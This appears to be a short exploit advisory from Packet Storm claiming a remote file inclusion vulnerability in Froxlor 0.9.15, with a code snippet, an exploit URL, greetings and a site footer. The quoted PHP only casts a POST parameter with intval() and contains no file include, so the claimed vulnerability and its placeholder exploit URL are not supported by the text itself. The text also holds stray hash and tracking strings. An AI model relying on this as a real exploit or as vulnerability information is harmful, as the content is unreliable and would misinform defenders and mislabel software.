Froxlor version 0.9.15 suffers from a remote file inclusion vulnerability.
8ebcce5b4c99d57ff95d79211a92b229bf99bb5d0ed9f349262716d627c8d152# Exploit Title: Froxlor v 0.9.15 Remote file include vulnerbility
# Google Dork: © 2009-2010 by the Froxlor Team
# Date: 26/1/2011
# Author: DIES3L
# Software Link: http://www.froxlor.org
# Version: v 0.9.15
# Tested on: ubuntu + win7
# Email : zxn@Hotmail.com
#######################################################
Fichier : customer_ftp.php
http://localhost/[path]/customer_ftp.php
Code :
<?php
require ("./lib/init.php");
$id = intval($_POST['id']);
?>
Exploit :
http://127.0.0.1/[path]/customer_ftp.php?id= [ DIES3L.txt ]
NOTE :-
** ONLY FOR PHP 4.x.x
Have Enjoy :)
##############################################################
#
Gr33t'z t0 : #
WwW.p0c.cc - WwW.D99Y.CoM - WwW.v4-Team.com - ALL My Friends #
#
##############################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed